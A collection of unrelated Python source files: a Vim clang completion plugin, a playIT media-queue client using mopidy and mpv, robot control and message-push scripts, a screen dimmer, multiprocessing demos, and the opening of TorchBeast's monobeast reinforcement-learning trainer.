user_finished = loop.run_in_executor(None, stdin_listener)
# Wait for user to indicate they are done listening for messages
await user_finished
# Cancel listening
listeners.cancel()
# uploadPhotoThread.join()
methodThread.join()
twinThread.join()
# Finally, disconnect
module_client.disconnect()
except Exception as e:
print ( "Unexpected error %s " % e )
raise
if __name__ == "__main__":
BLOB_ON_EDGE_MODULE = os.environ['BLOB_ON_EDGE_MODULE']
BLOB_ON_EDGE_ACCOUNT_NAME = os.environ['BLOB_ON_EDGE_ACCOUNT_NAME']
BLOB_ON_EDGE_ACCOUNT_KEY = os.environ['BLOB_ON_EDGE_ACCOUNT_KEY']
PHOTO_CONTAINER_NAME=os.environ['PHOTO_CONTAINER_NAME']
PHOTO_DATA_FOLDER = os.environ['PHOTO_DATA_FOLDER']
EDGE_DEVICEID = os.environ['IOTEDGE_DEVICEID']
fileUploader = BlobFileUploader(BLOB_ON_EDGE_MODULE, BLOB_ON_EDGE_ACCOUNT_NAME, BLOB_ON_EDGE_ACCOUNT_KEY, PHOTO_CONTAINER_NAME, EDGE_DEVICEID)
loop = asyncio.get_event_loop()
loop.run_until_complete(main('0', fileUploader))
loop.close()
|
yoda_vim.py
|
### import {{{1
import re, os, sys, threading, collections
import vimpy
import config_manager
import snippet_manager
### compatibility of python 2 and 3 ### {{{1
if vimpy.py_version >= 3:
# we must add module dir in system paths in python3.
yoda_dir = os.path.join( os.path.dirname(__file__), 'yoda' )
assert os.path.exists( yoda_dir )
sys.path.insert( 0, yoda_dir )
import yoda
sys.path.pop( 0 )
else: # python2
from yoda import yoda
### vim state ###{{{1
class _State( object ):
'''\
State object manage the vim status, thread and validate request for
index.
'''
def __init__( self ):
self._lock = threading.Lock()
self._fatal_message = ''
self.complete_start = 0
self.config_manager = config_manager.ConfigManager()
self.snippet_manager = snippet_manager.SnippetManager()
self.interfaces = []
self.includes_of_filenames = collections.defaultdict( set )
self.completions = None
### initialize ###
def Init( self ):
self.config_manager.Init( Vim.Get( 'g:yoda_config_basename' ),
Vim.Get( 'g:yoda_config_funcname' ) )
try:
self.snippet_manager.Init( Vim.Get( 'g:yoda_snippet_engine' ) )
except ImportError as e:
EchoHL( 'ModeMsg', str(e) )
### manage buffer ###
def IsValid( self, silent=False ):
def echohl( msg ):
if not silent: EchoHL( 'ModeMsg', msg )
flags = self.config_manager.CompilationFlags( Vim.FileName )
if None is Index:
echohl( 'Completion is OFF.' )
return False
elif None is flags:
echohl( 'No compilation flags found. '
'To give clang compliation flags, see :help yoda-quick-start.' )
return False
elif self._fatal_message:
echohl( self._fatal_message )
self._fatal_message = None
return False
return True
### fatal state ####
def SetFatal( self, message ):
self._fatal_message = message
### threading ###
def Lock( self ):
return self._lock
def IsParsing( self ):
if not self._lock.acquire( False ):
return True
else:
self._lock.release()
return False
### request data ###
def RequestData( self ):
compilation_flags = self.config_manager.CompilationFlags( Vim.FileName )
unsaved_files = [ ( Vim.FileName, Vim.Buffer ) ]
# vim cursor line starts from 1, but it's column starts from 0!
return dict(
filename = Vim.FileName,
line_num = Vim.LineNum,
column_num = Vim.ColNum+1,
unsaved_files = unsaved_files,
num_unsaved_flies = len( unsaved_files ),
compilation_flags = compilation_flags,
num_compilation_flags = len( compilation_flags ) )
### autocmd ### {{{1
State = _State()
Index = None
Vim = vimpy.VimPy()
def VimOnAutoLoad():
global Index
try:
library_filename = _FindClangLibrary( Vim.Get( 'g:yoda_clang_library' ) )
if not Vim.Get( 'g:yoda_clang_library' ):
Vim.Set( 'g:yoda_clang_library', library_filename )
State.Init()
if not library_filename:
EchoHL( 'ModeMsg',
'g:yoda_clang_library({}) is not set or is invalid. Disable completion. '
'See :help yoda-quick-start'.format( library_filename ) )
return 0
yoda.Initialize( library_filename )
Index = yoda.Index.make()
except Exception:
import traceback
EchoHL( 'WarningMsg',
'\n[failed to load clang library]\nreason: {}'.format(
traceback.format_exc() ) )
return 0
return 1
def VimOnFileType( config_param ):
try: # validate configuration file
if not State.config_manager.Register( Vim.FileName, config_param ):
return 0
except Exception as e:
EchoHL( 'ErrorMsg', '\nerrors in configuration file\nreason:\n{}'
.format( str(e) ) )
return 0
if not State.IsValid():
return
if not Vim.Get( 'g:yoda_shutup_when_loaded' ):
EchoHL( 'ModeMsg',
'load configuration file @{}'.format(
State.config_manager.ConfigFileForFileName( Vim.FileName ) ) )
if not State.IsValid():
return 0
_ReparseInBackground( True )
return 1
def VimOnIdle( force ):
return _ReparseInBackground( force )
def _ReparseInBackground( force ):
force = Vim.Get( 'g:yoda_greedy_reparsing' ) or force
if not State.IsValid(silent=True):
return 0
if not force and State.IsParsing():
return 0
### check include Experimental:
includes = set()
include_rx = re.compile( r'\s*#\s*include\s+[<"](.+)[>"]' )
for line in Vim.BufferAsList:
m = include_rx.match( line )
if m:
includes.add( m.group(1) )
past_includes = State.includes_of_filenames[ Vim.FileName ]
State.includes_of_filenames[ Vim.FileName ] = includes
if not len( past_includes ^ includes ) and not force:
return 0
### create deamon thread to reparse translation unit
def reparse( request_data ):
with State.Lock():
try:
tu = Index.translation_unit( request_data )
tu.reparse( request_data )
except Exception: ### XXX: the exception must catch!!
import traceback
msg = ('\nerror occured in "{}" background thread\n'
'reason:').format( '_ReparseInBackground()' )
State.SetFatal( msg + traceback.format_exc() )
request_data = State.RequestData()
update_deamon = threading.Thread( target=reparse, args=( request_data, ) )
update_deamon.daemon = True
update_deamon.start()
return 1
### complete ### {{{1
def CompleteStart():
if not State.IsValid():
return -1
l_line = Vim.Line[ : Vim.ColNum ]
if vimpy.py_version == 2: # TODO: Surrogate pair
l_line = l_line.decode( 'utf-8' )
match = re.search( r'(\w+)$', l_line, re.UNICODE )
State.complete_start = match.start() if match else Vim.ColNum
return State.complete_start
def Complete( base ):
if not State.IsValid():
return []
if State.IsParsing():
EchoHL( 'ModeMsg', 'yoda is still parsing. no compeletions yet.' )
return []
with State.Lock():
request_data = State.RequestData()
tu = Index.translation_unit( request_data )
State.completions = tu.code_completions( request_data )
# reduce completions and convert it into list of vim dicts
completions = State.completions.iterate( base )
completions = _ConvertFilterCompletions( completions, base )
# add completions and check to stop completion periodically.
for i, x in enumerate( completions ):
if i % 10000 == 0: # TODO: improve performance
Vim.Command('sleep 100m')
if Vim.complete_check() != '0':
break
Vim.complete_add( x )
return []
def VimOnCompleteDone():
State.completions = None
### goto ### {{{1
def LocationTo( kind ):
'get location to kind'
if not State.IsValid():
return {}
# dict contains translation unit functions of location kinds.
location_func = dict(
Declaration = lambda tu, req: tu.declaration_location_info( req ),
Definition = lambda tu, req: tu.definition_location_info( req )
)[ kind ]
with State.Lock(): # get location
request_data = State.RequestData()
tu = Index.translation_unit( request_data )
location_info = location_func( tu, request_data )
if not location_info or not location_info.filename:
return {}
# convert location_info to vim dict
return Vim.Py2Vim(
dict(
filename = location_info.filename,
bufnr = Vim.bufnr( location_info.filename ),
lnum = location_info.line_num,
col = location_info.column_num
) )
### diagnostics ### {{{1
def DiagnosticQfList():
'get diagnostic quickfix list of current buffer'
if not State.IsValid():
return []
with State.Lock():
request_data = State.RequestData()
tu = Index.translation_unit( request_data )
diagnostics = tu.diagnostics( request_data )
# converter of diagnostic
def make( diagnostic ):
loc = diagnostic.location_info
return dict(
bufnr = Vim.bufnr( loc.filename, 1 ),
lnum = loc.line_num,
col = loc.column_num,
text = diagnostic.text,
type = diagnostic.kind )
# predicate of diagnostics
def pred( diagnostic ):
if diagnostic.kind in ('E', 'W'):
return True
return False
# filter and map
return Vim.Py2Vim( make( d ) for d in diagnostics if pred( d ) )
### snippet ### {{{1
def ShouldSnip():
'whether current state can snippet'
if not State.IsValid():
return 0
return int( State.snippet_manager.Get().CanSnip() )
def TriggerSnip(): ###
'''
Trigger snippet which is selected completion of placeholder in insert mode.
'''
def divided_by( s, *positions ):
pos = 0
result = []
for p in positions:
assert pos <= p
result.append( s[pos:p] )
pos = p
result.append( s[pos:] )
return tuple( result )
if not State.IsValid() or not State.completions: # this will not return 0
return 0
# back up current line for exceptions.
backup_line = Vim.Line
backup_colnum = Vim.ColNum
pre, query, post = divided_by( backup_line, State.complete_start, backup_colnum )
# vim has prepared to get placeholder for query.
completions = State.completions
# search the first completion candidate is matched query.
# TODO: c++ function overrides have not supported yet.
completion_info = completions.search( query )
if not completion_info or not completion_info.has_placeholder():
# set current line as non query. because clang won't return completions if
# valid candidate inserted.
Vim.Line = pre + post
Vim.ColNum = State.complete_start
if _FeedKeysForCompletions( completions, query, pre, post ):
return 1
else:
Vim.Line = backup_line
Vim.ColNum = backup_colnum
return 0
# trigger the placeholder.
placeholder = _FormatPlaceHolder( completion_info.placeholder )
snip = State.snippet_manager.Get()
success = 0
try:
# trigger snippet. if exception raise or it returns 0, restore current
# line and return 0(fairure) otherwise return 1(success).
Vim.Line = ''
if snip.Trigger( pre, placeholder, post ):
success = 1
else:
success = 1
except Exception as e:
EchoHL( 'ErrorMsg', str(e) )
finally:
if not success: # error has occured. restore current line
Vim.Line = backup_line
Vim.ColNum = backup_colnum
return success
def _FormatPlaceHolder( placeholder ):
if not Vim.Get( 'g:yoda_snippet_space_in_parenthes' ):
return placeholder
def repl_paren( match ):
p = match.group(1)
return '{} {} {}'.format( p[0], p[1:-1], p[-1] )
reduced = placeholder
rxs = [ re.compile( r'(\(\{#.*?#\}\))' ), re.compile( r'(<\{#.*?#\}>)' ) ]
for rx in rxs:
reduced = rx.sub( repl_paren, reduced )
return reduced
def _FeedKeysForCompletions( completions, query, pre, post ):
'return True if inserted.'
def cased_next( s, query ):
res = s[ : len( query ) ]
cases = re.split( r'([A-Z][A-Z]*[a-z]*)|(_)', s[ len(res): ] )
for case in [ c for c in cases if c ]:
res += case
break
return ''.join( res )
def feedkeys( s ):
Vim.feedkeys( s, 'n' )
# Vim.Line = pre + s + post
# Vim.ColNum = len( pre+s )
left, right = completions.binrange( query )
if left < right \
and completions[ left ].spelling == completions[ right-1 ].spelling:
# only one completions
feedkeys( completions[ left ].spelling )
return True
elif (right-left) >= 2: # two or more completions
keys = cased_next( completions[ left ].spelling, query )
if keys == query or not keys:
return False
else:
feedkeys( keys )
return True
return False
### version ### {{{1
def Description():
if State.IsValid():
EchoHL('ModeMsg',
'\nlibarary @{}\n{}\npython version {}\nflags {}'.format(
Vim.Get('g:yoda_clang_library'),
yoda.Version(),
'.'.join( map( str, sys.version_info ) ),
State.config_manager.CompilationFlags( Vim.FileName ) ) )
### vim helper ### {{{1
def EchoHL( hl, message ):
return Vim.Call( 's:echohl', hl, message )
### find clang library ###{{{1
def _FindClangLibrary( library_path ):
'helper function to find clang library file'
def validate( libpath ):
if libpath and os.path.exists( libpath ):
return libpath
return ''
# platform dependent dynamic library name
import platform
sysname = platform.system()
def lib_basename():
d = dict( Darwin='libclang.dylib', Windows='libclang.dll' )
return d.get( sysname, 'libclang.so' )
if library_path:
library_path = os.path.expanduser( library_path )
if os.path.isdir( library_path ):
library_path = os.path.join( library_path, lib_basename() )
return validate( library_path )
else:
# try to find library using command `llvm-config`.
if Vim.executable( 'llvm-config' ) != '0':
dirname = Vim.system( 'llvm-config --libdir 2>/dev/null' ).strip()
library_path = os.path.join( dirname, lib_basename() )
# try to find library using environment variable $LD_LIBRARY_PATH
elif Vim.Get( '$LD_LIBRARY_PATH' ):
for dirname in Vim.Get( '$LD_LIBRARY_PATH' ).split( os.pathsep ):
libfile = os.path.join( dirname, lib_basename() )
if os.path.exists( libfile ):
library_path = libfile
break
return validate( library_path )
### convert completions ### {{{1
def _ConvertFilterCompletions( completions, query ):
'''
Filter completions by query and convert completions into vim completion
format.
'''
# decide how to reduce the completions
ignorecase = Vim.Get( '&l:ignorecase' )
if ignorecase:
query = query.upper()
starts_with = lambda x, q: x.upper().startswith( q )
else:
starts_with = lambda x, q: x.startswith( q )
# filter and convert completions
def convert( stack, icase ):
result = stack.popleft()
infos = [result.full_info]
while stack:
infos.append( stack.popleft().full_info )
return dict( word = result.spelling,
# abbr = result.syntax_except_return_type,
# menu = result.result_type,
info = '\n'.join( infos ),
menu = result.kind,
dup = 1,
icase = icase )
# collect same spellings for c++ name overrided functions.
# NOTE: `completions` suppose to be sorted.
same_spellings = collections.deque()
for x in completions:
spelling = x.spelling
if not starts_with( spelling, query ):
continue
if same_spellings and same_spellings[0].spelling != spelling:
yield convert( same_spellings, ignorecase )
same_spellings.append( x )
if same_spellings:
yield convert( same_spellings, ignorecase )
### set __all__ ### {{{1
__all__ = [
'VimOnAutoLoad',
'VimOnFileType',
'VimOnIdle',
'VimOnCompleteDone',
'CompleteStart',
'Complete',
'LocationTo',
'DiagnosticQfList',
'ShouldSnip',
'TriggerSnip',
'Description',
]
# vim:et:ts=2 sts=2 sw=2
|
bangabandhu.py
|
from expression import *
import multiprocessing
def talk():
say("bangabandhu sheikh mujibur rahman is our father of nation.")
say("he is the most hounarable person for our nation")
p2.start()
time.sleep(0.1)
say("i salute him")
time.sleep(1)
say("i respect him from core of my heart")
time.sleep(1.5)
def move():
changeDegree([3,9,5],[100,0,130])
changeDegree([7],[40])
time.sleep(0.9)
changeDegree([3,5,9], [70,60,90])
changeDegree([7], [30])
time.sleep(1.5)
takePosition()
p2 = multiprocessing.Process(target=move,args=[])
talk()
|
multiprogress.py
|
import time
from multiprocessing import Process,Manager
def subPrcess(name,d):
for j in range(100):
time.sleep(0.2)
d['process%d'%name] = j
def showmsg(d):
while 1:
time.sleep(1)
for k in range(5):
print 'Process%d:%d%%' % (k,d['process%d'%k])
if __name__ == '__main__':
d = Manager().dict()
p_list = []
for i in range(5):
p = Process(target=subPrcess,args=(i,d))
print 'Process %d start.' % i
p.start()
p_list.append(p)
sm = Process(target=showmsg,args=(d,))
sm.start()
for res in p_list:
res.join()
sm.terminate()
|
playIT_client.py
|
#!/usr/bin/python3
""" The client controller for the playIT backend
by Horv and Eda - 2013, 2014
To add a new type of playback. Add a function called _play_TYPE(media_item)
and define how it's handled. It will be called automatically based on the
type parameter specified in the downloaded json
Requires Python >= 3.3
Depends on:
1. mopidy - for Spotify and Soundcloud playback.
Note that you'll need both the spotify and soundcloud plugins
Eg. aurget -S mopidy mopidy-spotify mopidy-soundcloud
2. python-mpd2 (https://github.com/Mic92/python-mpd2)
3. python-requests (python library) for popping and checking server status.
4. mpv for video/YouTube playback. http://mpv.io/
5. youtube-dl
"""
import threading
import requests
import time
import argparse
import queue
import sys
from shutil import which
import subprocess
import select
# from subprocess import call
from mpd import MPDClient, CommandError
# Some settings and constants
POP_PATH = "/playIT/media/popQueue"
# Use verbose output
VERBOSE = False
MOPIDY_HOST = "localhost"
MOPIDY_PORT = 6600
def main():
""" Init and startup goes here... """
check_reqs()
playit = PlayIt()
vprint("Running main playback loop...")
ploop = threading.Thread(target=playit.start_printloop)
eloop = threading.Thread(target=playit.start_eventloop)
ploop.daemon = True
eloop.daemon = True
ploop.start()
eloop.start()
playit.start_prompt()
def check_reqs():
""" Verify that all dependencies exists. """
depends = ["mopidy", "mpv", "youtube-dl"]
failed = False
for dep in depends:
if which(dep) is None:
print("Requirement", dep, "is missing (from PATH at least...)",
file=sys.stderr)
failed = True
if failed:
print("Resolve the above missing requirements", file=sys.stderr)
exit(1)
else:
if not process_exists("mopidy"):
print("mopidy does not seem to be running.",
"Please launch it beforehand :)",
file=sys.stderr)
exit(2)
def interrupt_main():
from _thread import interrupt_main
interrupt_main()
def mpd_exec(cmd):
""" Executes the command named 'cmd' on a fresh MPD connection """
mpd = MPDClient()
mpd.connect(MOPIDY_HOST, MOPIDY_PORT)
retval = getattr(mpd, cmd)()
mpd.close()
mpd.disconnect()
return retval
def process_exists(proc_name):
""" http://stackoverflow.com/a/7008599 ."""
import re
ps = subprocess.Popen("ps ax -o pid= -o args= ",
shell=True, stdout=subprocess.PIPE)
ps_pid = ps.pid
output = ps.stdout.read()
ps.stdout.close()
ps.wait()
from os import getpid
for line in output.decode().split("\n"):
res = re.findall(r"(\d+) (.*)", line)
if res:
pid = int(res[0][0])
if proc_name in res[0][1] and pid != getpid() and pid != ps_pid:
return True
return False
def _fix_server_adress(raw_server):
""" Prepend http:// there. """
if not raw_server.startswith("http://"):
raw_server = "http://" + raw_server
return raw_server
def check_connection(url):
""" Checks the connection to the backend """
resp = requests.head(url + POP_PATH)
if resp.status_code != 200:
print("Unable to find backend at:", url,
file=sys.stderr)
exit(4)
def vprint(msg):
""" Verbose print """
if VERBOSE:
print(msg)
class PlayIt(object):
""" Defines the interface between the backend and actual playback. """
def __init__(self):
parser = argparse.ArgumentParser()
parser.add_argument('-m', '--monitor-number', dest="monitor_number",
type=int, default=1)
parser.add_argument('-s', '--server',
default="http://hubben.chalmers.it:8080")
#parser.add_argument('-v', '--verbose', action='store_true')
args = parser.parse_args()
if args.server is None:
print("Please supply a server by: -s http://www.example.org:port",
file=sys.stderr)
exit(3)
else:
self.server = _fix_server_adress(args.server)
vprint("Server: " + self.server)
check_connection(self.server)
self.monitor_number = args.monitor_number
self.print_queue = queue.Queue()
self.map_lock = threading.RLock()
def start_eventloop(self):
""" Start the event-loop. """
cmd_map = {"quit": interrupt_main}
while True:
self.set_cmd_map(cmd_map)
# item = {"nick": "Eda", "artist": ["Daft Punk"], "title": "Face to Face",
# #"externalID": "0fFHjnqpSpV8XuWyCKf6XU"}
# "externalID": "a5uQMwRMHcs"}
# self._play_youtube(item)
# time.sleep(7)
item = self._get_next()
if len(item) > 0:
# Dynamically call the play function based on the media type
func_name = "_play_" + item['type'].lower()
func = getattr(self, func_name)
func(item)
else:
vprint("No item in queue, sleeping...")
time.sleep(7)
def _get_next(self):
""" Get the next item in queue from the backend. """
vprint("Popping next item in the queue")
resp = requests.get(self.server + POP_PATH)
return resp.json()
def _play_youtube(self, item):
""" Play the supplied youtube video with mpv. """
self.print_queue.put("Playing youtube video: " + item['title']
+ " requested by " + item['nick'])
youtube_url = "https://youtu.be/" + item['externalID']
youtube_dl = ["youtube-dl", youtube_url, "-g"]
stream_url = subprocess.check_output(youtube_dl).decode('UTF8').strip()
cmd = ['mpv', '--fs', '--screen',
str(self.monitor_number), stream_url]
# print(cmd)
process = subprocess.Popen(cmd, stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
def quit():
process.stdin.write(b'q')
process.stdin.flush()
def toggle():
process.stdin.write(b' ')
process.stdin.flush()
# def fseek():
# process.stdin.write(b"\x1b[A")
# process.stdin.flush()
# def bseek():
# process.stdin.write(b"\x1b[B")
# process.stdin.flush()
self.set_cmd_map({"pause": toggle,
"play": toggle,
"stop": quit,
"toggle": toggle,
# "fseek": fseek,
# "bseek": bseek,
"quit": quit})
while process.poll() is None:
time.sleep(1)
def _play_spotify(self, item):
""" Play the supplied spotify track using mopidy and mpc. """
self.print_queue.put("Playing " + ", ".join(item['artist']) + " - "
+ item['title'] + " requested by " + item['nick'])
self._add_to_mopidy('spotify:track:' + item['externalID'])
def _play_soundcloud(self, item):
""" Play SoundCloud items """
self.print_queue.put("Playing " + item['artist'] + " - "
+ item['title'] + " requested by " + item['nick'])
self._add_to_mopidy('soundcloud:song.' + item['externalID'])
def _add_to_mopidy(self, track_id):
""" Play a mopidy compatible track """
client = MPDClient()
client.connect(MOPIDY_HOST, MOPIDY_PORT)
client.single(1)
client.clear()
try:
client.add(track_id)
client.play(0)
except CommandError as e:
self.print_queue.put("Failed to add song to Mopidy: " + str(e))
client.close()
client.disconnect()
def quit():
mpd_exec("stop")
interrupt_main()
def status():
song = mpd_exec("currentsong")
status = mpd_exec("status")
# TODO: make prettier...
status_line = song['artist'] + ' - ' + song['title'] + '\n' + \
'[' + status['state'] + '] ' + status['elapsed']
self.print_queue.put(status_line)
def toggle():
mpd_exec("pause")
status()
def play():
mpd_exec("play")
def stop():
mpd_exec("stop")
self.set_cmd_map({"pause": toggle,
"play": play,
"stop": stop,
"toggle": toggle,
"quit": quit,
"status": status})
self._mopidy_idle()
def _mopidy_idle(self):
client_idle = MPDClient()
client_idle.connect(MOPIDY_HOST, MOPIDY_PORT)
while client_idle.status()['state'] != "stop":
client_idle.idle()
client_idle.close()
client_idle.disconnect()
def set_cmd_map(self, map):
""" Set the map of all available commands (With thread lock) """
with self.map_lock:
self.cmd_map = map
def start_prompt(self):
""" Listen for user input (Like a shell) """
try:
cmd = ""
while cmd != 'quit':
self.print_queue.put('')
cmd = input()
if len(cmd) > 0:
if cmd in self.cmd_map:
self.cmd_map[cmd]()
elif cmd == "help":
keys = list(self.cmd_map.keys())
self.print_queue.put(", ".join(keys))
else:
self.print_queue.put('Unknown command "' + cmd + '"')
# Wait for queues to finish
self.print_queue.join()
except KeyboardInterrupt:
exit(1)
return
def start_printloop(self):
""" Prints everything from the print queue """
while True:
msg = self.print_queue.get()
if msg != '':
msg = msg + '\n'
print("\r" + msg + "> ", end='')
self.print_queue.task_done()
if __name__ == "__main__":
main()
|
robot_msg_push.py
|
from . import logger
import threading
class RobotMsgPush(object):
""" 信息推送接收器
监听40924端口上的推送信息
若接到信息,则将不同信息处理加入对应模块的属性中
信息推送可以通过robot.[robot_module].set_push()设置
Example:
# 获取机器人的底盘的位置信息推送
rm = rmepy.Robot(ip='127.0.0.1')
...
rm.push.start() # 激活推送接收线程
rm.chassis.set_push(pos_freq=5) # 命令机器人推送底盘位置信息
sleep(1)
print(rm.chassis.x, rm.chassis.y, rm.chassis.z) # 调取使用底盘位置信息
"""
def __init__(self, robot):
self.robot = robot
self.log = logger.Logger(self)
self.get_push_data = robot.connection.get_push_data
self._receiver_thread = threading.Thread(target=self._receiver_task)
self.running = False
def start(self):
""" 启动 信息推送接收器
Args:
None
Returns:
None
"""
self._receiver_thread.start()
self.log.info("MsgPushReceiver thread started.")
def _receiver_task(self):
"""信息接收&处理线程
Args:
None
Returns:
None
"""
self.running = True
while self.running and threading.main_thread().is_alive():
msg = self.get_push_data(timeout=2)
if msg:
for idx, m in enumerate(msg.split(';')):
if idx == 0:
module_name, _, attr, *values = m.split()
else:
attr, *values = m.split()
self._process_msg_push(module_name, attr, values)
self.log.debuginfo('Shutted down RobotMsgPush thread successfully.')
self.running = False
def _process_type(self, data, type_list):
""" 将字符串类型的数据处理成指定类型的数据
Args:
data (list/tuple): 要转换的数据
type_list (list/tuple/type): 目标数据类型
如果为 type,则将所有的输入数据转为该类型
若为 list/tuple,且type_list长度必须与data长度一致,所有元素都为 type 类型
那么将 data 的每个数据转成对应type_list中对应的类型
Returns:
(tuple): 转换完的输出
"""
try:
if isinstance(type_list, (list, tuple)):
data = [f(i) if f != bool else bool(int(i))for i, f in zip(data, type_list)]
else:
data = [type_list(i) if type_list != bool else bool(int(i)) for i in data]
except (TypeError, ValueError) as e:
self.log.warn(
"Error at processing push msg: %s does not match %s" % (data, type_list))
data = None
return data
def _process_msg_push(self, module_name, attr, values):
"""处理推送信息
将推送得到的信息转换赋值给对应的robot_modules
Args:
module_name (str)
attr (str)
values (list/tuple)
Returns:
None
"""
# TODO if-else是有点丑,但目前未能找到更好的选择方式 :(
robot = self.robot
if module_name == 'chassis':
if attr == 'position':
values = self._process_type(values, float)
(robot.chassis.x, robot.chassis.y) = values
elif attr == 'attitude':
values = self._process_type(values, float)
(robot.chassis.pitch, robot.chassis.roll, robot.chassis.yaw) = values
elif attr == 'status':
values = self._process_type(values, bool)
(robot.chassis.is_static, robot.chassis.is_uphill, robot.chassis.is_downhill, robot.chassis.is_on_slope, robot.chassis.is_pick_up, robot.chassis.is_slip,
robot.chassis.is_impact_x, robot.chassis.is_impact_y, robot.chassis.is_impact_z, robot.chassis.is_roll_over, robot.chassis.is_hill_static) = values
elif module_name == 'gimbal':
if attr == 'attitude':
values = self._process_type(values, float)
(robot.gimbal.pitch, robot.gimbal.yaw) = values
|
dimmer.py
|
import threading
import time
import logging
class Dimmer(object):
def __init__(self, screen_manager, keyboard_manager, dim_after, off_after, pass_through_buttons):
self._dim_after = dim_after
self._off_after = off_after
self._smgr = screen_manager
self._pass_through_buttons = pass_through_buttons
self._last_activity = time.time()
self._dimmed = False
self._off = False
self._lock = threading.Condition()
keyboard_manager.add_callback(self._on_kbd)
thread = threading.Thread(target=self._check)
thread.setDaemon(True)
thread.start()
def _check(self):
while True:
time.sleep(1)
sla = time.time() - self._last_activity
if self._dim_after is not None and sla > self._dim_after and not self._dimmed:
logging.info("Dimmer: dimming")
self._smgr.dim()
self._dimmed = True
if self._off_after is not None and sla > self._off_after:
logging.info("Dimmer: screen off")
self._smgr.screen_off()
self._dimmed = False
self._off = True
self._lock.acquire()
self._lock.wait()
self._lock.release()
def _on_kbd(self, buttons):
self._last_activity = time.time()
processed = False
logging.info("Dimmer::on_kbd, off:{}, dimmed:{}".format(self._off, self._dimmed))
if self._off:
logging.info("Dimmer: screen on")
self._smgr.screen_on()
self._off = False
processed = len(buttons) == 1 and buttons[0] not in self._pass_through_buttons
if self._dimmed:
logging.info("Dimmer: undimming")
self._smgr.undim()
self._dimmed = False
processed = len(buttons) == 1 and buttons[0] not in self._pass_through_buttons
self._lock.acquire()
self._lock.notifyAll()
self._lock.release()
return processed
|
monobeast.py
|
# Copyright (c) Facebook, Inc. and its affiliates.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import logging
import os
import pprint
import threading
import time
import timeit
import traceback
import typing
os.environ["OMP_NUM_THREADS"] = "1" # Necessary for multithreading.
import torch
from torch import multiprocessing as mp
from torch import nn
from torch.nn import functional as F
from torchbeast import atari_wrappers
from torchbeast.core import environment
from torchbeast.core import file_writer
from torchbeast.core import prof
from torchbeast.core import vtrace
# yapf: disable
parser = argparse.ArgumentParser(description="PyTorch Scalable Agent")
parser.add_argument("--env", type=str, default="PongNoFrameskip-v4",
help="Gym environment.")
parser.add_argument("--mode", default="train",
choices=["train", "test", "test_render"],
help="Training or test mode.")
parser.add_argument("--xpid", default=None,
help="Experiment id (default: None).")
# Training settings.
parser.add_argument("--disable_checkpoint", action="store_true",
help="Disable saving checkpoint.")
parser.add_argument("--savedir", default="~/logs/torchbeast",
help="Root dir where experiment data will be saved.")
parser.add_argument("--num_actors", default=4, type=int, metavar="N",
help="Number of actors (default: 4).")
parser.add_argument("--total_steps", default=100000, type=int, metavar="T",
help="Total environment steps to train for.")
parser.add_argument("--batch_size", default=8, type=int, metavar="B",
help="Learner batch size.")
parser.add_argument("--unroll_length", default=80, type=int, metavar="T",
help="The unroll length (time dimension).")
parser.add_argument("--num_buffers", default=None, type=int,
metavar="N", help="Number of shared-memory buffers.")
parser.add_argument("--num_learner_threads", "--num_threads", default=2, type=int,
metavar="N", help="Number learner threads.")
parser.add_argument("--disable_cuda", action="store_true",
help="Disable CUDA.")
parser.add_argument("--use_lstm", action="store_true",
help="Use LSTM in agent model.")
# Loss settings.
parser.add_argument("--entropy_cost", default=0.0006,
type=float, help="Entropy cost/multiplier.")
parser.add_argument("--baseline_cost", default=0.5,
type=float, help="Baseline cost/multiplier.")
parser.add_argument("--discounting", default=0.99,
type=float, help="Discounting factor.")
parser.add_argument("--reward_clipping", default="abs_one",
choices=["abs_one", "none"],
help="Reward clipping.")
# Optimizer settings.
parser.add_argument("--learning_rate", default=0.00048,
type=float, metavar="LR", help="Learning rate.")
parser.add_argument("--alpha", default=0.99, type=float,
help="RMSProp smoothing constant.")
parser.add_argument("--momentum", default=0, type=float,
help="RMSProp momentum.")
parser.add_argument("--epsilon", default=0.01, type=float,
help="RMSProp epsilon.")
parser.add_argument("--grad_norm_clipping", default=40.0, type=float,
help="Global gradient norm clip.")
# yapf: enable
logging.basicConfig(
format=(
"[%(levelname)s:%(process)d %(module)s:%(lineno)d %(asctime)s] " "%(message)s"
),
level=0,
)
Buffers = typing.Dict[str, typing.List[torch.Tensor]]
def compute_baseline_loss(advantages):
return 0.5 * torch.sum(advantages ** 2)
def compute_entropy_loss(logits):
"""Return the entropy loss, i.e., the negative entropy of the policy."""
policy = F.softmax(logits, dim=-1)
log_policy = F.log_softmax(logits, dim=-1)
return torch.sum(policy * log_policy)
def compute_policy_gradient_loss(logits, actions, advantages):
cross_entropy = F.nll_loss(
F.log_softmax(torch.flatten(logits, 0, 1), dim=-1),
target=torch.flatten(actions, 0, 1),
reduction="none",
)
cross_entropy = cross_entropy.view_as(advantages)
return torch.sum(cross_entropy * advantages.detach())
def act(
flags,
actor_index: int,
free_queue: mp.SimpleQueue,
full_queue: mp.SimpleQueue,
model: torch.nn.Module,
buffers: Buffers,
initial_agent_state_buffers,
):
try:
logging.info("Actor %i started.", actor_index)
timings = prof.Timings() # Keep track of how fast things are.
gym_env = create_env(flags)
seed = actor_index ^ int.from_bytes(os.urandom(4), byteorder="little")
gym_env.seed(seed)
env = environment.Environment(gym_env)
env_output = env.initial()
agent_state = model.initial_state(batch_size=1)
agent_output, unused_state = model(env_output, agent_state)
while True:
index = free_queue.get()
if index is None:
break
# Write old rollout end.
for key in env_output:
buffers[key][index][0, ...] = env_output[key]
for key in agent_output:
buffers[key][index][0, ...] = agent_output[key]
for i, tensor in enumerate(agent_state):
initial_agent_state_buffers[index][i][...] = tensor
# Do new rollout.
for t in range(flags.unroll_length):
timings.reset()
with torch.no_grad():
agent_output, agent_state = model(env_output, agent_state)
timings.time("model")
env_output = env.step(agent_output["action"])
timings.time("step")
for key in env_output:
buffers[key][index][t + 1, ...] = env_output[key]
for key in agent_output:
buffers[key][index][t + 1, ...] = agent_output[key]
timings.time("write")
full_queue.put(index)
if actor_index == 0:
logging.info("Actor %i: %s", actor_index, timings.summary())
except KeyboardInterrupt:
pass # Return silently.
